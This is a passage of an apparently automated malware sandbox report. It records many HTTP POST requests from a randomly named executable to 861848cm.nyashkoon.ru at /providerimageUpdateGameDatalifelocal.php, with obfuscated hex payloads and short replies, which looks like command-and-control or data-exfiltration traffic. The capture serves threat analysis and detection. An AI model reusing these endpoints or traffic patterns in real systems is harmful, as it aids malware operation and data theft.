                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:02.649226904 CET1024OUTData Raw: 56 5f 5a 54 53 5c 50 59 5a 5f 52 51 54 5f 5b 5b 55 54 59 5b 51 50 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_ZTS\PYZ_RQT_[[UTY[QPRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^8,>T=8+<#;=:1)&%;4_ T+.3Z.5<\7.]&9'X$.Q-2
                                                                                            Nov 5, 2024 23:54:03.123668909 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:03.201994896 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            101192.168.2.45010837.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:03.324435949 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:03.680490017 CET1016OUTData Raw: 56 54 5f 58 53 5a 50 5e 5a 5f 52 51 54 5a 5b 5c 55 5d 59 58 51 52 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VT_XSZP^Z_RQTZ[\U]YXQRR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8?1<; < \(9"?.6$87?#Y-C,]!7-%'X$.Q->
                                                                                            Nov 5, 2024 23:54:04.134897947 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:04.210491896 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:02 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            102192.168.2.45010937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:04.440805912 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:04.791635990 CET1024OUTData Raw: 56 5e 5f 5b 56 5b 50 59 5a 5f 52 51 54 5c 5b 5d 55 50 59 5f 51 5e 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^_[V[PYZ_RQT\[]UPY_Q^RZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/!?+?#=9>>9'X ?.<>'[,6,\#4%2'X$.Q->
                                                                                            Nov 5, 2024 23:54:05.252974033 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:05.323292017 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            103192.168.2.45011037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:05.452039957 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:05.805568933 CET1024OUTData Raw: 56 53 5a 5c 53 5d 50 5e 5a 5f 52 51 54 5c 5b 5b 55 57 59 58 51 50 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZ\S]P^Z_RQT\[[UWYXQPRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&8?2U<^$+$>92*:\0##+-#]:' >^&9'X$.Q->
                                                                                            Nov 5, 2024 23:54:06.255124092 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:06.329037905 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:04 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            104192.168.2.45011137.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:06.632776022 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:07.103657007 CET1024OUTData Raw: 56 55 5f 5e 56 5b 50 5f 5a 5f 52 51 54 5b 5b 53 55 50 59 5f 51 51 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VU_^V[P_Z_RQT[[SUPY_QQRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/Y6(+<\> ():)>90 /%?Z90_#'>2)'X$.Q-"


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            105192.168.2.45011237.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:07.254446983 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:07.602330923 CET1284OUTData Raw: 56 5f 5a 5a 56 5a 50 5b 5a 5f 52 51 54 5c 5b 5f 55 50 59 56 51 52 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_ZZVZP[Z_RQT\[_UPYVQRR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%Y,Y"++0<\*2=*%+4#<1<-<95(\#&_1'X$.Q->
                                                                                            Nov 5, 2024 23:54:07.964236975 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:08.045305967 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 23 04 2b 5c 2e 11 30 38 3b 0d 2a 3e 31 13 3f 30 06 07 2f 31 2c 5a 3e 33 20 11 2a 3b 33 0c 23 3f 20 07 36 31 35 5d 37 32 33 1d 28 11 21 5f 05 1d 39 5b 24 17 3f 0c 29 32 08 16 2a 24 2f 19 32 30 2c 45 2a 15 04 13 20 29 21 0d 25 07 39 5d 31 31 30 0c 2a 34 39 5e 2d 11 2f 55 32 3a 2a 57 09 16 20 54 24 0d 3c 00 29 21 2c 06 27 00 36 06 25 2a 28 0b 2a 2f 3f 58 34 1a 0c 58 2b 23 34 02 23 37 0c 11 33 04 26 40 24 3e 2c 09 3f 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: #+\.08;*>1?0/1,Z>3 *;3#? 615]723(!_9[$?)2*$/20,E* )!%9]110*49^-/U2:*W T$<)!,'6%*(*/?X4X+#4#73&@$>,?"&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            106192.168.2.45011337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:07.545978069 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:07.899245024 CET1016OUTData Raw: 56 55 5f 5f 56 5a 50 5a 5a 5f 52 51 54 5a 5b 58 55 57 59 5e 51 51 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VU__VZPZZ_RQTZ[XUWY^QQRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^/<-?^$_>0(]>5_>=^0(( >Q<.].54^19'X$.Q-.
                                                                                            Nov 5, 2024 23:54:08.359348059 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:08.433065891 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            107192.168.2.45011437.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:08.570498943 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:54:08.915697098 CET1024OUTData Raw: 53 56 5a 5d 56 58 50 52 5a 5f 52 51 54 5e 5b 5a 55 5c 59 59 51 55 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SVZ]VXPRZ_RQT^[ZU\YYQURZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X,/-+_<(\*1*>>Z%(<Y -<.:%/#7%29'X$.Q-6
                                                                                            Nov 5, 2024 23:54:09.380712986 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:09.457796097 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            108192.168.2.45011537.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:09.592510939 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:09.946111917 CET1024OUTData Raw: 56 55 5a 5d 56 5a 50 5a 5a 5f 52 51 54 5e 5b 52 55 56 59 5c 51 52 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VUZ]VZPZZ_RQT^[RUVY\QRRYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;6( Y>##**)^)6Z3_49<?.&3 7&9'X$.Q-6
                                                                                            Nov 5, 2024 23:54:10.403675079 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:10.479734898 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:08 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            109192.168.2.45011637.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:10.612543106 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:10.961744070 CET1024OUTData Raw: 56 5f 5a 5a 56 5f 55 58 5a 5f 52 51 54 5b 5b 5f 55 51 59 5e 51 53 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V_ZZV_UXZ_RQT[[_UQY^QSRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/2R?+>3<[*9)_>"$8+7:W+.(.C'#$:Y&'X$.Q-"
                                                                                            Nov 5, 2024 23:54:11.436425924 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:11.506879091 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            110192.168.2.45011737.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:11.637455940 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:11.992942095 CET1024OUTData Raw: 56 5e 5f 5b 56 5f 50 5d 5a 5f 52 51 54 5f 5b 53 55 53 59 5a 51 51 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^_[V_P]Z_RQT_[SUSYZQQRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;>(;<_?+*_>_3; >+.C ^4'&9'X$.Q-2
                                                                                            Nov 5, 2024 23:54:12.457803011 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:12.536762953 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:10 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            111192.168.2.45011837.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:12.671814919 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:13.024193048 CET1024OUTData Raw: 56 53 5a 55 56 57 55 5d 5a 5f 52 51 54 5d 5b 5d 55 5c 59 56 51 51 52 5b 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VSZUVWU]Z_RQT][]U\YVQQR[TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%8,)??(3 *)Y?>&]0+44Y><>3\:% _#%&9'X$.Q-


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            112192.168.2.45011937.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:13.066154957 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:13.414905071 CET1284OUTData Raw: 56 50 5a 54 53 5b 50 5a 5a 5f 52 51 54 5d 5b 53 55 54 59 5a 51 51 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VPZTS[PZZ_RQT][SUTYZQQR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%\/=(+?<#*-*>)$;#?1(> -53#4%%'X$.Q-
                                                                                            Nov 5, 2024 23:54:13.875760078 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:13.953942060 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:11 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 15 3c 14 08 58 27 3b 34 50 3e 3e 39 59 2b 0e 20 04 38 31 34 59 29 0a 3b 02 2a 2b 27 08 34 01 05 5c 22 22 2d 58 23 0c 20 01 2b 11 21 5f 05 1d 3a 02 27 29 3c 55 3d 31 26 5e 3d 09 27 1e 25 23 38 44 3e 5d 2e 11 20 04 22 1c 31 2d 39 1f 25 32 33 1b 28 24 2a 05 2d 59 3b 57 26 00 2a 57 09 16 23 0c 30 0d 2c 02 29 31 27 5f 30 2e 21 58 25 03 33 57 3e 2f 2c 01 20 27 3d 04 2a 23 24 06 22 27 22 13 33 3a 08 41 31 00 3c 0b 3f 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: <X';4P>>9Y+ 814Y);*+'4\""-X# +!_:')<U=1&^='%#8D>]. "1-9%23($*-Y;W&*W#0,)1'_0.!X%3W>/, '=*#$"'"3:A1<?"&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            113192.168.2.45012037.44.238.25080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:54:13.274378061 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:54:13.633609056 CET1016OUTData Raw: 56 57 5f 58 56 57 50 5b 5a 5f 52 51 54 5a 5b 5b 55 50 59 58 51 54 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VW_XVWP[Z_RQTZ[[UPYXQTRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%;&U<^<?(\=)>?-5$$Z#Y=+.3-%/ 7_%'X$.Q-"
                                                                                            Nov 5, 2024 23:54:14.094239950 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:54:14.167088032 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:54:12 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
